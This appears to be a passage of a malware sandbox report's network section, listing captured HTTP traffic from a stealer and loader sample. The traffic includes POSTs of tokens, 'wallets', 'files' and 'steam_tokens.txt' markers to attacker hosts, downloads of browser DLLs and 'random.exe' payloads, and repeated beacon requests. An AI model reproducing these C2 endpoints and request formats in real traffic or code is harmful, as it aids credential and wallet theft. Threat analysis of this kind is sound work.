Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="file"------HJJJECFIECBGDGCAAAEH--
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 2d 2d 0d 0a Data Ascii: ------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="file"------EBFHJEGDAFHIJKECFBKJ--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015356001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCFHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="message"wallets------BAKFCBFHJDHJKECAKEHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBAHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 2d 2d 0d 0a Data Ascii: ------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="message"files------FBKECFIIEHCFHIECAFBA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015357001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file"------AEHIJKKFHIEGCBGCAFIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"ybncbhylepme------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015358001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 2d 2d 0d 0a Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFCBKKKJJJKKEBGDAFID--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build"stok------AFCAAEGDBKJJKECBKFHC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015359001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build"stok------HCAEHJJKFCAAFHJKFBKK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
